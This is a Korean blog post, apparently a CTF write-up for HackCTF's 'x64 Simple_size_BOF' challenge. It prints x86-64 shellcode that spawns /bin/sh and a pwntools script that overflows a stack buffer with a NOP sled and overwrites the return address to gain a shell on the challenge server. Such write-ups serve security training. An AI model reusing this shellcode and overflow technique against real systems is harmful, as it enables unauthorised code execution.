상세 컨텐츠

본문 제목

[HackCTF] x64 Simple_size_BOF

SYSTEM HACKING/HackCTF

by koharin 2020. 1. 1. 17:21

본문

728x90
반응형

1. 보호기법 확인

 

 

계속 ex가 안 되서 뭐가 문제인가 했더니 쉘코드를 기존에 사용하던 것과 다른 것을 사용해야 한다고 한다..

 

"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

 

이 쉘코드를 사용하니까 제대로 쉘이 따졌다.

 

2. exploit code

 

#!/usr/bin/python                                                                       
from pwn import *

context.log_level = 'debug'
#p = process("./Simple_size_bof")
p = remote("ctf.j0n9hyun.xyz", 3005)

p.recvuntil("buf: ")
buf = int(p.recv(14), 16)
log.info("buf : "+hex(buf))

shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

pay = '\x90'*100
pay += shellcode
pay += '\x90'*(0x6d30-len(pay))
pay += 'A'*0x8
pay += p64(buf)

p.sendlineafter("\n", pay)

p.interactive()
            

 

3. exploit

 

728x90
반응형

'SYSTEM HACKING > HackCTF' 카테고리의 다른 글

[HackCTF] offset  (0) 2020.01.01
[HackCTF] Simple_Overflow_ver_2  (0) 2020.01.01
[HackCTF] x64 Buffer Overflow  (0) 2020.01.01
[HackCTF] 내 버퍼가 흘러넘친다!!!  (0) 2020.01.01
[HackCTF] Basic_FSB  (0) 2020.01.01

관련글 더보기